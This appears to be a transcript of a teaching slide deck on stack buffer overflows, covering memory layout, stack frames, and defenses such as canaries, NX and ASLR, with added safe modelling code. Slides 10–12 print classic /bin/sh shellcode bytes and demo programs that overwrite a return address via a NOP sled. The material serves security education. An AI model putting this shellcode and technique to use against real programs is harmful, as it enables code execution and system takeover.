Overflows - PowerPoint PPT Presentation

Slides: 19
Provided by: Epana

Transcript and Presenter's Notes

1
Overflows Exploits
2
In the beginning
  • 11/02/1988 Robert Morris, Jr., a graduate
    student in Computer Science at Cornell, wrote an
    experimental, self-replicating, self-propagating
    program called a worm and injected it into the
    Internet. One of the programs it attacked was
    fingerd, which contained a buffer overflow.
  • 02/13/1995 Thomas Lopatic posts to
    Bugtraq: "Hello there, we've installed the NCSA
    HTTPD 1.3 on our WWW server (HP9000/720, HP-UX
    9.01) and I've found, that it can be tricked
    into executing shell commands."
  • 08/11/1996 "Smashing the Stack For Fun And
    Profit" by Aleph1 (Phrack 49): syslog, splitvt,
    sendmail 8.7.5, Linux/FreeBSD mount, Xt library,
    at, etc.

3
Program Memory
Your Program

  #include <stdio.h>
  #include <string.h>

  static int counter;
  static int another_variable = 0xAABBCCDD;

  void do_something(char *from)
  {
      char to[32];
      strcpy(to, from);
      counter++;
  }

  int main(int argc, char *argv[])
  {
      char *msg = "This is a constant string";
      counter = 0;
      do_something(msg);
      printf("%d Somethings Done\n", counter);
      return 0;
  }

Process memory layout, high addresses at the top:

  High Memory Addresses
    Args / Environment Variables
    Stack                              (grows toward lower addresses)
    Unused Memory
    Heap                               (grows toward higher addresses)
    Un-Initialized Data Segment (bss)  (e.g. counter)
    Initialized Data                   (e.g. another_variable)
    RO data                            (e.g. the string literal msg points to)
    Text Segment                       (the compiled code)
  Low Addresses
4
The Stack
  • A stack is a type of data structure.
  • The last object put on to the stack is the first
    that is removed (LIFO).
  • Push: add something to the stack.
  • Pop: remove something from the stack.

5
Function Calls & The Stack
  • When a function is called:
  • Function arguments are pushed on the stack.
  • Return address is pushed on the stack (by the
    call instruction).
  • The previous function's base pointer is pushed on
    the stack.
  • Local variables are pushed on the stack.

6
Function Calls & The Stack

  #include <stdio.h>

  int add(int x, int y)
  {
      return x + y;
  }

  int main(int argc, char *argv[])
  {
      int num = 0;
      num = add(4,5);
      printf("num = %d\n", num);
      return 0;
  }

Stack while add() runs, high addresses at the top:

  0xc0000000
  +----------------------+
  | num = 0              |  main's stack frame
  +----------------------+
  | 5                    |  argument y          \
  | 4                    |  argument x           |
  | Ret addr             |                       |  add's stack frame
  | Saved base ptr       |                       |
  | (add's local vars)   |                      /
  +----------------------+
  | ...                  |
  | Heap                 |
  0x08000000

  • Function arguments are pushed on the stack.
  • Return address is pushed on the stack (by the
    call instruction).
  • The previous function's base pointer is pushed on
    the stack.
  • Local variables are pushed on the stack.
7
Function Calls & The Stack
32-bit x86 assembly (AT&T syntax) for the program on slide 6:

  main:
      pushl   %ebp
      movl    %esp, %ebp
      subl    $24, %esp
      andl    $-16, %esp
      movl    $0, %eax
      addl    $15, %eax
      addl    $15, %eax
      shrl    $4, %eax
      sall    $4, %eax
      subl    %eax, %esp
      movl    $0, -4(%ebp)        # num = 0
      movl    $5, 4(%esp)         # second argument, y
      movl    $4, (%esp)          # first argument, x
      call    add                 # pushes the return address (eip)
      movl    %eax, -4(%ebp)      # num = add(4,5)
      movl    -4(%ebp), %eax
      movl    %eax, 4(%esp)       # argument for printf

  add:
      pushl   %ebp                # save main's base pointer
      movl    %esp, %ebp          # add's frame starts here
      movl    12(%ebp), %eax      # y
      addl    8(%ebp), %eax       # + x
      popl    %ebp                # restore main's base pointer
      ret                         # pop the return address into eip

Stack while add() is executing, high addresses at the top; esp moves
down as each value is pushed:

  ebp1 -> main's saved base pointer
          num = 0          (-4(%ebp1); the slide crosses the 0 out and
                            writes 9 once add returns)
          5                (y, at 12(%ebp2))
          4                (x, at 8(%ebp2))
          eip              (return address, pushed by call)
  ebp2 -> saved ebp1       (pushed by add's pushl %ebp)
  esp  -> same slot as ebp2 while add runs, since add has no locals

Source, as on slide 6:

  int add(int x, int y)
  {
      return x + y;
  }

  int main(int argc, char *argv[])
  {
      int num = 0;
      num = add(4,5);
      printf("num = %d\n", num);
      return 0;
  }
8
Overflows
Same program as on slide 3 (to[] is 32 bytes; msg is "This is a
constant string"). Stack during do_something(msg), high addresses at
the top, with to[] drawn four bytes per row and its first bytes at the
bottom:

  Ptr to msg        (the argument main passed)
  Return Addr
  Base Ptr
  32 bytes for to:
    g\0             (25 characters plus the NUL are 26 bytes,
    trin             so the copy fits inside the buffer)
    nt_s
    nsta
    a_co
    _is_
    This
9
Overflows
The same program, but msg is now "This is a constant string that is
too long for our buffer": 57 characters plus the NUL, 58 bytes copied
into a 32-byte buffer, so 26 bytes run on past its end.

  #include <stdio.h>
  #include <string.h>

  static int counter;
  static int another_variable = 0xAABBCCDD;

  void do_something(char *from)
  {
      char to[32];
      strcpy(to, from);
      counter++;
  }

  int main(int argc, char *argv[])
  {
      char *msg = "This is a constant string that is "
                  "too long for our buffer";
      counter = 0;
      do_something(msg);
      printf("%d Somethings Done\n", counter);
      return 0;
  }

Stack during do_something(msg), high addresses at the top; the labels
on the left are the bytes of msg that land on each slot:

  g_fo   -> Ptr to msg
  _lon   -> Return Addr    (overwritten)
  _too   -> Base Ptr       (overwritten)
  32 bytes for to:
    at_is
    g_th
    trin
    nt_s
    nsta
    a_co
    _is_
    This
10
Shellcode
  • Shell code is raw machine code that performs some
    useful function for an attacker (usually to grant
    a shell)
  • char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  • See http://www.vividmachines.com/shellcode/shellcode.html

11
Overflows
Now to[] is 45 bytes, the length of the shellcode, and msg is the
shellcode followed by "AAAABBBB": 53 characters plus the NUL, so the
copy runs 9 bytes past the buffer.

  #include <stdio.h>
  #include <string.h>

  void do_something(char *from)
  {
      char to[45];
      strcpy(to, from);
  }

  int main(int argc, char *argv[])
  {
      char *msg =
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB";
      do_something(msg);
      return 0;
  }

Stack during do_something(msg), high addresses at the top:

  Ptr to msg
  Return Addr   <- BBBB; on the slide this becomes 0xc0a104b0, the
                   address of to, so that ret lands on the copied bytes
  Base Ptr      <- AAAA
  45 bytes for to (starting at 0xc0a104b0):
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh"
12
Overflows
to[] grows to 256 bytes and msg gains a run of 32 \x90 (NOP) bytes in
front of the shellcode. The return address then only has to land
somewhere in the NOP run, which is why the slide writes it as
0xc0a104??: the exact address of to no longer needs to be known.

  #include <stdio.h>
  #include <string.h>

  void do_something(char *from)
  {
      char to[256];
      strcpy(to, from);
  }

  int main(int argc, char *argv[])
  {
      char *msg =
          "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
          "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB";
      do_something(msg);
      return 0;
  }

Stack during do_something(msg), high addresses at the top:

  Return Addr   <- 0xc0a104?? (any address inside the NOP run)
  Base Ptr      <- AAAA
  256 bytes for to (starting at 0xc0a104b0):
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh"
    \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90
    \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90
    \x90 \x90                     (the slide draws 20 of the 32 NOPs)
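The three overflow slides above (8, 9 and 11) all reduce to the same arithmetic: how many bytes strcpy() writes, and which saved slots above the buffer those bytes land on. The following program is an added example, not code from the slides: it models do_something()'s frame as the slides draw it (buffer, 4-byte saved base pointer, 4-byte return address, then the caller's frame) and reports what a copy of a given message would overwrite, using only size arithmetic so it runs safely anywhere. The struct, function names and the 45-byte filler standing in for the shellcode are choices made here.

```c
/* Added example (not from the slides): a size-only model of the stack
 * frame drawn on slides 8, 9 and 11, reporting what a strcpy() of msg
 * into a buf_size-byte buffer would overwrite.  Assumes the 32-bit
 * layout of the slides: buffer, saved base pointer, return address. */
#include <stdio.h>
#include <string.h>

#define SAVED_EBP_SIZE 4
#define RET_ADDR_SIZE  4

struct overflow_report {
    size_t bytes_copied;         /* strlen(msg) + 1 for the terminating NUL */
    size_t bytes_past_end;       /* how many of those land beyond the buffer */
    int    ebp_clobbered;        /* saved base pointer touched? */
    int    ret_clobbered;        /* return address touched? */
    int    ret_fully_controlled; /* all 4 return-address bytes came from msg */
};

/* Model strcpy(to, msg) for a buffer of buf_size bytes. */
struct overflow_report model_strcpy(size_t buf_size, const char *msg)
{
    struct overflow_report r;
    r.bytes_copied = strlen(msg) + 1;
    r.bytes_past_end = r.bytes_copied > buf_size ? r.bytes_copied - buf_size : 0;
    r.ebp_clobbered = r.bytes_past_end > 0;
    r.ret_clobbered = r.bytes_past_end > SAVED_EBP_SIZE;
    r.ret_fully_controlled = r.bytes_past_end >= SAVED_EBP_SIZE + RET_ADDR_SIZE;
    return r;
}

/* Which slot a single byte of msg (at index offset) would land on. */
const char *landing_zone(size_t buf_size, size_t offset)
{
    if (offset < buf_size) return "buffer";
    offset -= buf_size;
    if (offset < SAVED_EBP_SIZE) return "saved base pointer";
    offset -= SAVED_EBP_SIZE;
    if (offset < RET_ADDR_SIZE) return "return address";
    return "caller's frame (e.g. the pointer to msg)";
}

static void print_report(const char *label, size_t buf_size, const char *msg)
{
    struct overflow_report r = model_strcpy(buf_size, msg);
    printf("%s: %zu bytes into to[%zu], %zu past the end; ebp %s, ret %s\n",
           label, r.bytes_copied, buf_size, r.bytes_past_end,
           r.ebp_clobbered ? "clobbered" : "intact",
           r.ret_clobbered ? "clobbered" : "intact");
}

int main(void)
{
    /* Constructed stand-in for slide 11's payload: 45 filler bytes in
     * place of the shellcode, followed by the slide's AAAABBBB tail. */
    char payload[45 + 8 + 1];
    memset(payload, 'S', 45);
    memcpy(payload + 45, "AAAABBBB", 9);   /* 9 copies the NUL as well */

    print_report("slide 8",  32, "This is a constant string");
    print_report("slide 9",  32, "This is a constant string that is too long for our buffer");
    print_report("slide 11", 45, payload);
    return 0;
}
```

Running it gives 26 bytes and no overflow for slide 8, 58 bytes with 26 past the end for slide 9, and 54 bytes with 9 past the end for slide 11, where the AAAA lands on the saved base pointer, the BBBB on the return address and the NUL one byte into the caller's frame, exactly as the slides draw it.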
13
Defenses
  • char *strncpy(char *dest, const char *src, size_t n)
  • Use safe(r) functions.
  • Check the size of the input before you copy
    blindly.

  void do_something(char *from)
  {
      char to[256];
      strncpy(to, from, 255);
      to[255] = '\0';   /* strncpy writes no terminator when from is 255
                           bytes or longer; index 255 is the last valid
                           element of to[256], one past it would itself
                           overflow */
  }
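The slide's strncpy() fix silently truncates, and it still needs the explicit terminator. The program below is an added example, not from the slides: copy_truncating() is the slide's approach with the terminator, and copy_checked() follows the "check the size before you copy" bullet by measuring with a bounded length function and refusing input that does not fit rather than cutting it off. The function names, the global demo_to buffer, the 0/-1 return convention and the constructed 300-byte input are choices made here.

```c
/* Added example (not from the slides): two bounded replacements for the
 * strcpy() in do_something(), against a 256-byte buffer as on slide 13. */
#include <stdio.h>
#include <string.h>

#define TO_SIZE 256

char demo_to[TO_SIZE];   /* destination used by main() and the checks */

/* Length of s, but never looking past max bytes: an unterminated or huge
 * input cannot make the measurement itself run far. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* The slide's fix.  strncpy() pads with NULs only when from is shorter
 * than n; when from is n bytes or longer it writes no terminator, so the
 * last byte is set explicitly.  Returns 1 if the input was truncated. */
int copy_truncating(char *to, size_t to_size, const char *from)
{
    strncpy(to, from, to_size - 1);
    to[to_size - 1] = '\0';            /* last valid index is to_size - 1 */
    return strlen(from) >= to_size;    /* 1 if something was cut off */
}

/* Measure first, then copy.  Returns 0 on success, -1 if from plus its
 * NUL does not fit; nothing is written in the failure case. */
int copy_checked(char *to, size_t to_size, const char *from)
{
    size_t len = bounded_len(from, to_size);
    if (len >= to_size)
        return -1;                      /* would need len + 1 > to_size bytes */
    memcpy(to, from, len + 1);          /* copies the terminator too */
    return 0;
}

/* Constructed input: 300 'A's, longer than the 256-byte buffer. */
const char *long_input(void)
{
    static char big[301];
    memset(big, 'A', 300);
    big[300] = '\0';
    return big;
}

int main(void)
{
    if (copy_checked(demo_to, sizeof demo_to, "This is a constant string") == 0)
        printf("fits: \"%s\"\n", demo_to);
    if (copy_checked(demo_to, sizeof demo_to, long_input()) != 0)
        printf("rejected: %zu bytes do not fit in %d\n",
               strlen(long_input()) + 1, TO_SIZE);
    if (copy_truncating(demo_to, sizeof demo_to, long_input()))
        printf("truncated copy kept %zu of %zu characters\n",
               strlen(demo_to), strlen(long_input()));
    return 0;
}
```

Whether to truncate or reject is an application decision; rejecting is the safer default when the input is a path, a command or anything whose meaning changes when its tail is dropped.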
14
Defenses
  • No eXecute stack (NX bit)
  • Code should be run from the text section; the
    stack should never be the target of the
    instruction pointer.
  • Make the stack non-executable, and the processor
    will fault when a stack overflow attack tries to
    execute code placed on the stack.

15
Defenses
  • Stack Canary
  • Generated by the compiler
  • A random value is pushed to the stack after the
    return address and saved base pointer, between
    them and the local variables
  • Before returning from a function the canary
    value is checked to see if it still matches the
    value that was set
  • An attacker cannot determine the canary value
    before the execution of the program

Frame of do_something() with a canary, high addresses at the top:

  Ptr to msg
  Return Addr
  Base Ptr
  Canary 0x31332241
  32 bytes for to:
    g\0
    trin
    nt_s
    nsta
    a_co
    _is_
    This

A copy that runs past to[] has to cross the canary before it reaches
the base pointer or the return address, so the mismatch is caught at
return time.
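The following program is an added example, not code from the slides: it models the compiler's canary check with a struct laid out like the frame drawn above (buffer, canary, saved base pointer, return address), copies a message into it the way strcpy() would, and runs the epilogue check before "returning". The copy is bounded to the struct so the program is well defined on any platform; the struct, function names, the placeholder saved values and the use of the slide's canary constant are choices made here.

```c
/* Added example (not from the slides): a software model of the stack
 * canary on slide 15.  The struct stands in for do_something()'s frame
 * in the order the slide draws it. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

struct frame {
    char     to[32];
    uint32_t canary;
    uint32_t saved_base_ptr;
    uint32_t return_addr;
};

/* The slide's example value.  A real compiler draws a fresh random
 * value at program start, so an attacker cannot know it in advance. */
#define CANARY_VALUE 0x31332241u

/* Copy msg (with its NUL) into the frame as strcpy() would, but never
 * beyond the end of the struct.  Returns the number of bytes written. */
size_t unchecked_copy(struct frame *f, const char *msg)
{
    size_t n = strlen(msg) + 1;
    if (n > sizeof *f)
        n = sizeof *f;                  /* bound so the model stays defined */
    memcpy((unsigned char *)f, msg, n);
    return n;
}

/* Epilogue check: 0 if the canary is intact, 1 if it was smashed. */
int check_canary(const struct frame *f, uint32_t expected)
{
    return f->canary != expected;
}

/* One call of do_something(msg): set up the frame, copy, check before
 * the saved values would be used.  Returns 1 if smashing was detected. */
int simulate_call(const char *msg)
{
    struct frame f;
    f.canary = CANARY_VALUE;
    f.saved_base_ptr = 0xbffff000u;     /* constructed placeholder values */
    f.return_addr = 0x08048400u;
    unchecked_copy(&f, msg);
    if (check_canary(&f, CANARY_VALUE)) {
        /* This is where the compiler's check-failure path aborts the
         * process, before the corrupted return address is ever used. */
        return 1;
    }
    return 0;
}

int main(void)
{
    const char *ok  = "This is a constant string";
    const char *bad = "This is a constant string that is too long for our buffer";
    printf("\"%s\" -> %s\n", ok,
           simulate_call(ok) ? "stack smashing detected" : "returned normally");
    printf("\"%s\" -> %s\n", bad,
           simulate_call(bad) ? "stack smashing detected" : "returned normally");
    return 0;
}
```

Note the boundary: 31 characters plus the NUL fill to[] exactly and leave the canary intact, while 32 characters put the NUL on the canary's first byte, which is already enough to change it and trip the check.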
16
Defenses
  • Randomized Address Layouts
  • Segments of memory can be relocated slightly to
    produce different offsets each time a program is
    run
  • A hardcoded address (in shellcode, for example) will
    not be valid from one run to the next

17
Recent Overflows
  • Microsoft Windows Animated Cursor Remote Code
    Execution Vulnerability (3/28/2007)
  • http://vil.nai.com/vil/Content/v_vul28505.htm
  • A remote code execution vulnerability exists in
    the way that cursor, animated cursor, and icon
    formats are handled. An attacker could try to
    exploit the vulnerability by constructing a
    malicious cursor or icon file that could
    potentially allow remote code execution if a user
    visited a malicious Web site or viewed a
    malicious e-mail message. An attacker who
    successfully exploited this vulnerability could
    take complete control of an affected system.
  • Windows 2000 SP4
  • Windows 2003 SP0 - SP2
  • Windows XP SP2
  • Vista SP0

18
Links
  • Attack
  • http://www.phrack.org/archives/49/P49-14
  • http://en.wikipedia.org/wiki/Buffer_overflow
  • http://seclists.org/bugtraq/1995/Feb/0109.html
  • Defense
  • http://fedoraproject.org/wiki/Security/Features
  • http://www.grsecurity.net/
  • http://www.trl.ibm.com/projects/security/ssp/
  • Misc
  • BugTraq - http://www.securityfocus.com/archive/1
  • VulnDev - http://www.securityfocus.com/archive/82
  • Metasploit - http://www.metasploit.com/